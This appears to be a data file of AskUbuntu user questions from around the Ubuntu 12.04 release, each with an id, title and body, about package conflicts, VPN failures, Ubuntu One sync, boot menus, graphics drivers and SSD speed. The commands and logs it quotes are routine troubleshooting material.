141370	how to fix a broken package , when `` apt-get install -f '' does not work ?	i tried to install scala with the typesafe stack and got into trouble . now i can not do much with apt ( except update ) , the broken package seems to be impossible to remove/clean : here 's the result of apt-get -f install : $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : gstreamer0.10-fluendo-mp3 : i386 scala-library liboil0.3 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : scala the following new packages will be installed : scala 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 4 not fully installed or removed . need to get 21.5 mb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //apt.typesafe.com/ unicorn/main scala all 2.9.2-400 [ 21.5 mb ] fetched 21.5 mb in 13s ( 1,567 kb/s ) ( reading database ... 329381 files and directories currently installed . ) unpacking scala ( from ... /scala_2.9.2-400_all.deb ) ... dpkg : error processing /var/cache/apt/archives/scala_2.9.2-400_all.deb ( -- unpack ) : trying to overwrite '/usr/share/java/scala-partest.jar ' , which is also in package scala-library 2.9.1.dfsg-3 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/scala_2.9.2-400_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) here 's my attempt to autoremove : $ apt-get autoremove e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? phdp @ desktop : ~/work/manuscripts/ideas/ibm_food_webs $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : typesafe-stack : depends : scala but it is not installed e : unmet dependencies . try using -f .
141372	vpn pptp failed 1	i used network-manager-pptp to configure the vpn . but always i get the same message when i try to connect to the vpn : connection failed . in the sys log i have : < info > vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 3042 may 23 22:17:42 nr5 networkmanager [ 983 ] : < info > vpn service 'pptp ' appeared ; activating connections may 23 22:17:42 nr5 networkmanager [ 983 ] : < info > vpn plugin state changed : init ( 1 ) may 23 22:17:42 nr5 networkmanager [ 983 ] : < info > vpn plugin state changed : starting ( 3 ) may 23 22:17:42 nr5 networkmanager [ 983 ] : < info > vpn connection 'vpn name ' ( connect ) reply received . may 23 22:17:42 nr5 networkmanager [ 983 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) may 23 22:17:42 nr5 networkmanager [ 983 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . may 23 22:17:47 nr5 networkmanager [ 983 ] : < info > ( eth0 ) : ip6 addrconf timed out or failed . may 23 22:17:47 nr5 networkmanager [ 983 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... may 23 22:17:47 nr5 networkmanager [ 983 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... may 23 22:17:47 nr5 networkmanager [ 983 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . may 23 22:18:13 nr5 networkmanager [ 983 ] : < warn > vpn plugin failed : 1 may 23 22:18:14 nr5 networkmanager [ 983 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) may 23 22:18:14 nr5 networkmanager [ 983 ] : < warn > vpn plugin failed : 1 may 23 22:18:14 nr5 networkmanager [ 983 ] : < warn > vpn plugin failed : 1 may 23 22:18:14 nr5 networkmanager [ 983 ] : < info > vpn plugin state changed : stopped ( 6 ) may 23 22:18:14 nr5 networkmanager [ 983 ] : < info > vpn plugin state change reason : 0 may 23 22:18:14 nr5 networkmanager [ 983 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . before i started the vpn connection , the routing table looks : destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 after i tried to start vpn , the ip-address x.x.x.x from the vpn server was added to the routing table : destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 x.x.x.x 192.168.1.1 255.255.255.255 ugh 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 also the same vpn-connection works on the same machine under windows without problem . if you have some suggestions , i would be happy to here them . thank you a lot .
141378	where are the ubuntu software center configuration files ?	i 'd like to look at the ubuntu software center configuration files , to check and see if there 's a simple reason why the package appears to be partly broken . does anyone know where they should be , on a standard , just-installed-yesterday from a formatted harddrive ubuntu 12.04 install ? all the features of software-center work , except syncing between computers . i think there might be a user name or password problem , or some simple problem identifying my other computers . i ca n't tell without more information . in short , sometimes my other computers appear on the list in the sync menu in software-center . sometimes they do n't . and when they do appear , i do not get a package list for the other installs when i click on them . when running software-center from the command line i get this message : software-center 2012-05-23 13:52:06,630 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none ' 2012-05-23 13:52:06,637 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-05-23 13:52:06,854 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2012-05-23 13:52:07,237 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) i suspect the `` no username in config file '' is pointing to the key problem . how do i fix it ? other related discussions : ubuntu forums thread how can i sync application between multiple computers ? edit : going on eliah kagan 's comments , i ran : cd ~/.config ; rm -r software-center and sudo apt-get -- purge -- reinstall install software-center on my computers ... and everything is exactly the same . there are no other computers listed to sync with , the `` no username in config file '' message is still there , etc . no improvement with the symptoms . and my ~/.config/software-center/softwarecenter.cfg file looks like this . should it ? [ general ] maximized = false size = 871 , 536 add_to_launcher = true recommender_uuid = recommender_profile_id = the more i google-around the more i see other people have the same blank entries in their softwarecenter.cfg file , so i suspect this is n't the problem . perhaps its my user account on the ubuntu servers . how would i check that this is n't the source of the problem ? edit2 : perhaps logging out of ubuntu software center here https : //login.ubuntu.com/+applications and re logging in might help , technically , `` deleting '' then running software center to re-launch the application . hmm , no this does n't seem to have any effect . still only the local computer is listed . it 's strange because yesterday my other computers were listed before i clicked on the `` stop syncing '' option . i ca n't seem to get them to come back up .
141381	ubuntu in usb.. boot from fixed hdd ?	i am having ubuntu 12.04 minimal installed on my usb pen-drive ; which i use on several systems as portable os . i was thinking to edit the boot parameters so that before the main ubuntu os is loaded , it shows an option to boot from hard drive for 5 seconds , and then boots to ubuntu . this way i 'll be able to have an option to boot to the os installed on the hard-drive , without removing or unplugging my ubuntu usb stick . how do i edit the boot parameters to achieve this ?
141386	how to install the translations for trac	i have installed trac on my server running ubuntu 12.04 . the problem is that the users can not change the language in their preferences . instead , the following message is displayed : translations are currently unavailable . trac has been localized to more than a dozen of languages but in order to be able to use them , the babel package needs to be present when installing trac . see tracinstall for details . the installation has been done using the repositories of ubuntu , but i could not find any package related to trac and babel , nor trac and anything related to internationalization . how can i install the translations for trac ?
141387	will ubuntu 12.04 run smoothly with these specs ?	i have a computer with the following specs : intel pentium 4 3.00 ghz 2 gb ram a pci nvidia video card will ubuntu run smoothly on this machine ?
141388	login into ubuntu one with old email address	i have got a peculiar problem . i have created ubuntu one using university alias email address and the email address has been deleted mean while . i also forgot the password . now how can i get access to the ubuntu one that i have created already . any help would be appreciated . thank you , best regards , sai
141397	why do i get multiple global ipv6 addresses listed in ifconfig ?	this could be a no-brainer , but when i look in ifconfig it lists two different global ipv6 addresses . is there a reason why i 'm getting two assigned ? should n't i just get a single address ? valorin @ gandalf : ~ $ ifconfig eth0 link encap : ethernet hwaddr e8:9a:8f:6d:6a : aa inet addr:172.10.10.1 bcast:172.10.10.255 mask:255.255.255.0 inet6 addr : 2400:4000 : cafe:2014:48c8 : f262 : ebe8:297b/64 scope : global inet6 addr : 2400:4000 : cafe:2014 : ea9a:8fff : fe6d:6aaa/64 scope : global inet6 addr : fe80 : :ea9a:8fff : fe6d:6aaa/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:258 errors:0 dropped:0 overruns:0 frame:0 tx packets:313 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:78280 ( 78.2 kb ) tx bytes:46173 ( 46.1 kb ) interrupt:41 base address:0xe000
141399	ubuntu on pandaboard giving me troubles	i 'm trying to install the omap4 extras for ubuntu on my pandaboard . for some reason , a few packages ca n't seem to be agree with eachother . this what i did so far : installed on ubuntu 11.10 on sd card powered on pandaboard and let it finish it 's initial install did an `` apt-get update '' and `` apt-get upgrade '' , to install updates so far , everything went fine , and i was quite happy with my pandaboard , but then i made the mistake of typing this : apt-get install ubuntu-imap4-extras at first , everything seemed ok , and it started downloading and installing . but then after a while it just crashed . i tried it again but then it gave me this : reading package lists ... done building dependency tree reading state information ... done ubuntu-omap4-extras is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : gstreamer0.10-openmax : depends : gstreamer0.10-plugins-bad but it is not going to be installed gstreamer0.10-plugin-ducati : depends : gstreamer0.10-plugins-bad but it is not going to be installed ubuntu-omap4-extras-multimedia : depends : gstreamer0.10-plugins-bad ( > = 0.10.22-2ubuntu4+ti1.5 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . so i tried to the suggestion : apt-get -f install : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : gstreamer0.10-plugins-bad the following new packages will be installed : gstreamer0.10-plugins-bad 0 upgraded , 1 newly installed , 0 to remove and 4 not upgraded . 88 not fully installed or removed . need to get 0 b/1,794 kb of archives . after this operation , 4,571 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 143575 files and directories currently installed . ) unpacking gstreamer0.10-plugins-bad ( from ... /gstreamer0.10-plugins bad_0.10.22-2ubuntu4+ti1.5.4.8+1_armel.deb ) ... dpkg : error processing /var/cache/apt/archives/gstreamer0.10-plugins-bad_0.10.22-2ubuntu4+ti1.5.4.8+1_armel.deb ( -- unpack ) : trying to overwrite '/usr/lib/libgstbasecamerabinsrc-0.10.so.0.0.0 ' , which is also in package gstreamer0.10-plugins-good 0.10.30-1ubuntu7.1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/gstreamer0.10-plugins-bad_0.10.22-2ubuntu4+ti1.5.4.8+1_armel.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) seems like two packages ( plugins-good and plugins-bad ) are fighting over the same library . any idea on how to fix this ? ?
141403	is it possible to sync a folder from nas drive to ubuntu one cloud ?	i am running ubuntu one on windows 7 . i have a synology ds212+ nas drive that i would ideally like to back up to my cloud . however , ubuntu one only allows me to backup from the user documents folder on the computer i am running from . is there a way to back up a folder from my nas directly ? at the moment , i run a scheduled sync toy task to copy the folder from the nas to the user documents folder , which then gets picked up in my nightly ubuntu sync . this seems a bit of a hack . is there any way of mounting the nas folder inside the user directory ?
141404	problems installing ubuntu ?	i seem to be heaving a problem putting ubuntu on an older computer of mine . i have used the universal usb installer and put it on the usb drive and connected it to the computer . i went through the process and downloaded ubuntu properly but once it restarted it re ran the installation process , i could see ubuntu on my computer but only if the drive was left in ( which is pointless because i dont want to insert a drive each and every time ) . i wondering how i can fix this ?
141406	with this way to set up ubuntu , would i have to set up windows again on my machine with raid-10 ?	if i have a windows 7 64-bit system with raid-10 and ocz 128gb synapse cache drive for caching , will i have to totally redo my setup if i do a total install of ubuntu 12.04 ?
141408	uninstalling ubuntu partition	i want to uninstall ubuntu that i have partitioned on my hard drive ? i want it uninstalled so that i can install the new version for windows that allows for dual booting ( alongside windows ) how do i get to the area where i can access ubuntu that was partitioned ? i want to get to in so i can uninstall it , before i install ubuntu for windows . i tried creating an iso image of ubuntu on my usb drive , but i could n't access the welcome page of the program so i could get to the allocate drive space portion , but it never showed up . is that the way to go about it ?
141410	installed 12.04 from live cd , after login/password and updates completed , then all i get is a black screen and	a arrow cursor . i am very newbie , so need help in complete instructions , i am using 9.04 to ask here , it is the only way i knew to get online . thanks dolores
141411	remove ati video card and install asus/nvidia 210 silent	what is the correct procedure for removing an ati hd2400pro and installing an asus 210 silent ? ubuntu 12.04
141413	how to avoid nvidia optimus syndrome ?	i 'll be buying new laptop in few days , and reading the nvidia optimus problems , i got really scared . i 'm not sure if i understand it correctly , if laptop has nvidia optimus capable card , as for example geforce gt 630m , does that mean that such laptop has optimus capability or that 's only the case if it has intel integrated card as well ? for example , when looking at laptops specifications , i ca n't see intel card anywhere nor `` optimus '' key word , it confuses me . obviously if only nvidia card was present then their card will work fine , but are there such cases where no intel card is present ? what about ati , do they have some kind of equivalent technology that is not supported on linux ? if not , i 'd be probably better of with ati card .
141418	ubuntu one ca n't sync folders through authenticated proxy	i am on ubuntu 12.04 lts . i can connect my account to ubuntu one . but i ca n't sync the folders to my account . whenever i open the ubuntu one desktop client , it appears `` file sync is starting '' at the right top corner . then after two minutes , `` file sync is disconnected '' . i am behind a proxy that requires a user name and password .
141422	upgrade to 10.04 lts stopped in the middle of installing	i inherited an old laptop from a friend . booted it up and went to install ubuntu updates . the update manager said that there was an upgrade to 10.4.04 lts available and i went with that . it downloaded everything and started installing files . so far so good . then , at some point during the installation ( before the clean up and reboot stages ) it just stopped . the image that was on the desktop background went away , and is now a lovely shade of brown . most items from the system menu still work , but slowly . some apps do n't work at all . the monitor shows cpu at 100 % use , but nothing seems to be happening . the drive light is not blinking either . there is n't anything on this computer i want to save - would just like to get it working again . thanks .
141423	dell vostro 1520 wifi not working with ubuntu 12.04	i have installed ubuntu 12.04 on dell vostro 1520 laptop . but found wifi is hardware locked , though wifi is working perfectly fine with windows 7 in the same laptop . i tried to upgrade the drivers as mentioned in other posts/forums but could not resolve the issue . i had the similar problem with versions 11 . * as well . last time the wifi worked with 10 . * version . please help me to get it resolved .
141426	how can i run digikam after installing it ?	i have installed digikam in the software center on my ubuntu 10.04 lts system but i can not find it . i have checked out applications but it is not there . i know i have it because when i view the installed packages in the ubuntu software center it is listed as being installed .
141428	intel 330 ssd running slow , how can i improve performance ?	i just installed a new intel 330 60 gb ssd into my hp mini 2140 laptop . but it 's not going as fast as expected and my hdparm results are n't looking very good compared to ssd benchmarks at : https : //wiki.archlinux.org/index.php/ssd_benchmarking my results and info are below . hdparm results : justin @ justin-hp-2140 : ~ $ sudo hdparm -tt /dev/sda /dev/sda : timing cached reads : 1130 mb in 2.00 seconds = 564.50 mb/sec timing buffered disk reads : 372 mb in 3.01 seconds = 123.53 mb/sec justin @ justin-hp-2140 : ~ $ hdparm info : justin @ justin-hp-2140 : ~ $ sudo hdparm -i /dev/sda /dev/sda : ata device , with non-removable media model number : intel ssdsc2ct060a3 serial number : cvmp215107ww060agn firmware revision : 300i transport : serial , ata8-ast , sata 1.0a , sata ii extensions , sata rev 2.5 , sata rev 2.6 , sata rev 3.0 standards : used : unknown ( minor revision code 0x0110 ) supported : 9 8 7 6 5 likely used : 9 configuration : logical max current cylinders 16383 16383 heads 16 16 sectors/track 63 63 -- chs current addressable sectors : 16514064 lba user addressable sectors : 117231408 lba48 user addressable sectors : 117231408 logical sector size : 512 bytes physical sector size : 512 bytes logical sector-0 offset : 0 bytes device size with m = 1024*1024 : 57241 mbytes device size with m = 1000*1000 : 60022 mbytes ( 60 gb ) cache/buffer size = unknown nominal media rotation rate : solid state device capabilities : lba , iordy ( can be disabled ) queue depth : 32 standby timer values : spec 'd by standard , no device specific minimum r/w multiple sector transfer : max = 16 current = 16 advanced power management level : 128 dma : mdma0 mdma1 mdma2 udma0 udma1 udma2 udma3 udma4 udma5 *udma6 cycle time : min=120ns recommended=120ns pio : pio0 pio1 pio2 pio3 pio4 cycle time : no flow control=120ns iordy flow control=120ns commands/features : enabled supported : * smart feature set security mode feature set * power management feature set * write cache look-ahead * host protected area feature set * write_buffer command * read_buffer command * nop cmd * download_microcode * advanced power management feature set power-up in standby feature set * set_features required to spinup after power up * 48-bit address feature set * mandatory flush_cache * flush_cache_ext * smart error logging * smart self-test * general purpose logging feature set * write_ { dma|multiple } _fua_ext * 64-bit world wide name * idle_immediate with unload * write_uncorrectable_ext command * { read , write } _dma_ext_gpl commands * segmented download_microcode * gen1 signaling speed ( 1.5gb/s ) * gen2 signaling speed ( 3.0gb/s ) * native command queueing ( ncq ) * host-initiated interface power management * phy event counters * unknown 76 [ 14 ] * dma setup auto-activate optimization device-initiated interface power management * software settings preservation * smart command transport ( sct ) feature set * sct data tables ( ac5 ) * data set management trim supported ( limit 1 block ) * deterministic read data after trim security : master password revision code = 65534 supported not enabled not locked frozen not expired : security count supported : enhanced erase 4min for security erase unit . 2min for enhanced security erase unit . logical unit wwn device identifier : 5001517bb28c2593 naa : 5 ieee oui : 001517 unique id : bb28c2593 checksum : correct in the hp mini 2140 bios there are 2 options that from some other issues may have an impact : sata : enable/disable dual core/cpu support : enable/disable both of these are enabled my default . if i disable sata then the hdparm results show it is twice as slow . has anyone experienced slow ssd ? or seen an issue with the hd config ? or know how to fix this to get speeds that a new generation ssd should be capable of ? note that this is with a fresh install on 12.04 lts . note : by slow i mean 20 second boot to desktop ( no login ) , 5 seconds to start terminal - was hoping that with ssd starting apps would be 1 sec update : - thanks for all the answers - have applied trim and noop - helps a bit - but think the main problem as identified by john is the limitation of hp mini : (
141435	internet ridiculously slow on ubuntu where as its very fast on windows 7 in the same machine	i recently installed ubuntu in my machine which already has windows 7 . internet pages load really fast when i boot windows 7 , but its very very slow and sometimes wont even load in ubuntu 12.04 lts . i tried several solutions mentioned online but nothing works . my settings use ipv4 not ipv6 . please help .
141436	vgaswitcheroo not available on cold boot , only after restart	i am running the new ubuntu 12.04 64-bit release on my msi cx420 laptop . it has 2 gpus , an ati and an intel integrated one . so my problem is that , whenever i start my laptop for the first time , vgaswitcheroo does not seem to be loaded as the path /sys/kernel/debug/vgaswitcheroo/switch does not exist yet my ati card seems to be powered still and heats up my laptop to a painful to the hands degree . however , when i restart the computer , vgaswitcheroo finally appears . although the workaround may be easy , but it gets annoying really if i have to start the computer every time . now , i 'm thinking of submitting a bug to launchpad , but not sure if this really is a bug ( or what package it is , if it is a bug ) i do have a custom startup script though in /etc/rc.local , it simply turns off the ati card ( when vgaswitcheroo exists ) . it looks like this , and it might pose an impact to my problem : until [ -e /sys/kernel/debug/vgaswitcheroo/switch ] ; do : # do absolutely nothing done chmod a+rx /sys/kernel/debug chmod a+w /sys/kernel/debug/vgaswitcheroo/switch echo off > /sys/kernel/debug/vgaswitcheroo/switch any help / advice would be great ! thanks
141439	problem with kde 's pseudo-tiling side-by-side feature	i 'm using kubuntu 12.04 lts with kde 4.8.2 . i 'm having a problem with the pseudo-tiling feature where dragging a window into the side of the screen makes it occupy that half of the screen . if i 've already dragged a window to one side and i decide to drag it to the other side , it only goes further into the same side , with half the window disappearing .
141445	what games can be installed ?	can you put older games on it , such as the older age of empires games , the age of mythology games , the star wars : empire at war games , etc . ?
141450	installed ubuntu 12.04 and no menu on boot !	i had installed ubuntu 12.04 on a separate partition , in ext4 format in my comp , which initially had only windows 7 . i had done the installation from a live usb , which gave me the option install on boot , in a grub menu . i had chosen the option of `` installing ubuntu alongside windows '' . i had chosen the particular partition during the install , and in mount part , i had given / . and i chose my only hard disk drive as the location to install the bootloader . the whole install process was over , and i was asked to restart , and while doing to it asked me to remove my installation media , which in my case was a live usb . i acted accordingly and removed it . while booting however , it booted directly in windows , and no menu or option came for me to choose from both .
141452	micromax 3g mobile internet modem not being detected	i have micromax 3g modem , and i inserted it in the usb port , but it is not being detected by ubuntu 12.04 , that i 'm using from a live usb . i tried creating a mobile internet connection , however , eventhough i created it , there is no option to connect . i had previously used 11.10 ubuntu , and it had automatically detected the datastick modem and asked me to create a connection . on typing lsusb in the terminal it gives the following : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 03f0:5307 hewlett-packard bus 001 device 008 : id 1c9e:9605 omega technology bus 001 device 006 : id 5986:0364 acer , inc tried to insert the modem before boot , with negative results
141453	ubuntu one under kde	currently , while ubuntu one can be installed under kde , dolphin does not know about it , so it can not set folders other than ubuntu one to sync . there is a command line utility , `` u1sdtool '' , which performs most if not all the functions you need . setting the keyring password to be the same as your login wo n't prevent ubuntu one asking you for it again on login . if you want to change it , install seahorse , look for it in your menus as `` passwords and keys '' , and right click over `` passwords : default '' , then select `` change password '' . the various deleting tricks i 've read about do n't work for me . there is an ubuntuone-client-kde being developed , but no clue as to when it will appear in a stable repo . any further advice will be welcomed by me and doubtless a few other kde users .
141461	my ubuntu software center has been hanging on installation	so my usc has been hanging at 50 % while installing matlab for the past 10 hours . i was wondering how to kill this process . in addition to that , i was wondering how this matlab application on linux worked . does it customize an already installed matlab to become unix compatible ? thank you !
141468	need graphics configuration for 12.04	i am trying to get the graphic interface running for a new 12.04 install on an embedded pc . there is no separate graphic card but the onboard graphic chip is an sm722 . is there a driver in ubuntu for this chip ? is there anywhere else i can find this driver ? my web searches have turned up empty . if there is support for this chip in 12.04 how do i tell the os about this chip ? is there an option at boot time ?
141469	boot from usb w/ grub2 ... computer is useless right now ... help ! ! !	i 'm running ubuntu 12.04 on my macbook air , and after a botched update attempt the os wo n't boot & recovery mode wo n't boot . the only thing i can do is drop into the grub2 prompt . i have a usb drive that i should be able to boot from , but after going through these commands : set root= ( hd1 ) chainloader +1 i get an error that says `` invalid efi path '' . my macbook air has no other os installed , so i ca n't go into refit or anything . what are my options here ? i was able to get into busybox at one point this evening , but heck if i know how to get back to it lol . tl ; dr : need to boot macbook air from usb drive ; can only use grub2 ; chainloader +1 does n't seem to work . help ? !
141472	how can i speed up booting time in ubuntu 12.04	the booting process is about 30-50 seconds . is there anything i can do ? this my computer specs : -memory-1.9 gib -processor-pentium ( r ) dual-core cpu t4500 @ 2.30ghz x 2 -os type-64 bit i'am in dual- boot with windows
141474	ubuntu 12.04 - desktop crashes constantly	what logs do i check to find out why my desktop is crashing back to the login screen so much ? it happens multiple times a day . thank you .
141478	how to fix what ccsm does to unity 3d ?	i installed ccsm a little while back . then i enabled `` blur windows '' and the desktop got all messed up , unity 2d still works fine . i have tried every fix i 've found here on askubuntu but still ca n't get unity 3d to work normally . is there something i 'm missing ? i activated `` blur windows '' , by now i already uninstalled it , wiped all config files to it i was able to find and tried unity -- reset , unity -- replace and gconftool -- recursive-unset /apps/compiz-1 no success .
141479	dell inspiron n5110 keyboard & touchpad	i have dell laptop `` n 5110 `` how do make 2 finger scrolling work + 2 fingers zoom in & zoom out work how to fn + f3 to lock touchpad how to configure 1 2 3 as shown in pic 3.1 for ubuntu software center 3.2 for system settings 3.3 for screen off how can i configure the touchpad and keyboard settings on a dell inspiron 5110 ? nothing work & i did google but find nothing xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ sleep button id=10 [ slave keyboard ( 3 ) ] ↳ laptop_integrated_webcam_hd id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ dell wmi hotkeys id=14 [ slave keyboard ( 3 ) ]
141481	ubuntu 12.04 eclipse icon in launcher	i downloaded eclipse from the eclipse website , when i launch eclipse , the launcher shows a question mark icon ( ? ) for eclipse . i tried the solution mentioned here , but it dint work for me . i also tried specifiying the icon path in my eclipse.desktop , but it dint have any effect . do i need to do this in a different way in 12.04 ?
141482	ubuntu 12.04 using b43-fwcutter	i have used 10.04 with the b43-fwcutter driver to drive my bcm4318 broadcom card ( a linksys wpc54g v3 ) on my old dell inspiron 8100 for two years+ with no troubles . i just upgraded to 12.04 and although everything worked fine after install , before i added the b43-fwcutter driver , once i installed the driver , the system refuses to boot . even before i install the linksys card ! ! it just hangs on boot with graphical garbage on the screen . i tried several attempts to recover the system using the live cd , and finally reinstalled completely . i have been thru the cycle , install fresh system , verify everything works , then install b43-fwcutter and it is hung , several times . consistent hard fail . the system runs fine on hardwire ethernet , and wireless was fine on 10.04 . but i can not get there with 12.04 . so after several attempts , i am now ready to admit defeat and ask for help . i have read every thread that search turned up , and either the advice is to do what i did , i.e . install fwcutter , or does not apply ( different broadcom , sta , legacy , whatever ) so what do i need to do to fix it ? or is the b43-fwcutter driver broken for 12.04 ? thoughts ? tips ? log files needed ? ?
141483	how do i make the unity launcher completely transparent ?	before anyone jumps the gun and votes to close this , i am not asking how to make it `` see-through '' , which you can adjust in ccsm by setting the opacity to 0 % . i 'm asking the following : how can you make the launcher completely transparent ? i have both the launcher and top panel set to 0 % . as you can see , the top panel is completely transparent . but , the launcher is ... well , not . even though i set it to 0 % , it is far from transparent . i 'm assuming this has to do with the chameleon coloring . whenever i have the launcher on top of another window , it is transparent , but with the line on the side that separates the launcher from the window . i did ask this in another question to see if it was possible to remove that . if anyone has an answer to remove that , let me know , but that 's not quite what i had in mind . tl , dr : i want to make it so that the launcher is really transparent .
141486	unable to shutdown ubuntu 12.04	i just have installed ubuntu 12.04 64 bits just few days ago , and everything is ok , but just some times when i tray to shutdown the system just freezes for a long time , and i have to force the shutdown with the power button . any advise or any way to use the terminal to know what is the problem . i 'm using a dell with ati video card , 4gb ram .
141488	what are the entries in the grub menu ?	on booting my computer , i see multiple entries in my grub menu such as memtest , various ubuntu versions and a corresponding recovery option . what does memtest mean and why are there a lot of ubuntu entries ? does one differ from the other ?
141493	ubuntu 12.04 business desktop install file too large - 834mb	my blank cd 's are only 700 mb , and the .iso file i downloaded is over this . what do i do ?
141499	upgrade as if fresh install	i made an old desktop operational again , but i want to have a new username , and get rid of everything in the present natty installation . is it possible to upgrade to 12.04 as if performing
141502	12.04 vpn/resolv.conf issues	according to http : //www.stgraber.org/2012/02/24/dns-in-ubuntu-12-04/ resolv.conf contains only a single record for local dnsmasq server when i connect to openvpn server using network-manager-openvpn my /var/run/nm-dns-dnsmasq.conf gets updated right server=/example.com/10.108.23.1 server=/10.in-addr.arpa/10.108.23.1 server=10.1.0.1 but ! /etc/resolv.conf gets updated as well when , according to the article above , it shouldn't nameserver 10.108.23.1 # this is useless , dnsmasq is responsible for this now nameserver 127.0.0.1 # this should be the only line and only domain names in vpn subnames are resolved when i manually remove the first line , everything works as expected , resolving domain names in both lan and vpn subnets is it a bug ? or i can have it fixed somehow ?
141509	how can i get rid of the motd message `` *** /dev/sdb1 will be checked for errors at next reboot *** '' ?	my motd persistently has : *** /dev/sdb1 will be checked for errors at next reboot *** the problem is that i do n't have /dev/sdb1 on my system . i only have /dev/sdb2 ( mouted as / ) and /dev/sda1 which mounts to /media/backup . i delete that line from /etc/motd , but it reappears after reboot . here 's my df output : filesystem size used avail use % mounted on /dev/sdb2 73g 3.7g 66g 6 % / udev 490m 4.0k 490m 1 % /dev tmpfs 200m 760k 199m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 498m 0 498m 0 % /run/shm /dev/sda1 1.9t 429g 1.4t 25 % /media/backup update here is the output of sudo fdisk -l disk /dev/sda : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0003dfc2 device boot start end blocks id system /dev/sda1 63 3907024064 1953512001 83 linux disk /dev/sdb : 80.0 gb , 80026361856 bytes 255 heads , 63 sectors/track , 9729 cylinders , total 156301488 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00049068 device boot start end blocks id system /dev/sdb1 152301568 156301311 1999872 82 linux swap / solaris /dev/sdb2 * 2048 152301567 76149760 83 linux partition table entries are not in disk order i guess /dev/sdb1 is my swap space .
141510	how can i recover encrypted data from a previous ubuntu installation ?	i tried to upgrade from 10.10 to 11.04 but it crashed . it could n't mount disk drives so i did a new installation without erasing the previous drives . now i ca n't access access-your-private-data .
141512	how to resolve `` failed to download repository information '' ?	whenever i try to install anything with the ubuntu software center , the following error appears . failed to download repository information check your internet connection . e : unable to parse package file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_multiverse_i18n_index ( 1 )
141513	how to lower wait time for repository updates	when doing a aptitude update / apt-get update or using the update manager to update sometimes i get to a repository link that takes too long . the percent does not end and it takes quite a while before it ignores it . how can i lower the time so that if a particular repository takes more than 10 seconds to connect or finish it should ignore it and move the following ones . here is an image explaining the problem : it is trying to connect to archive.ubuntu.com but since it is taking too long it just sits there for at least 3 to 5 minutes ( have n't measured the time ) and then it shows as ignored and moves to the following . i wish to change that to seconds instead of minutes .
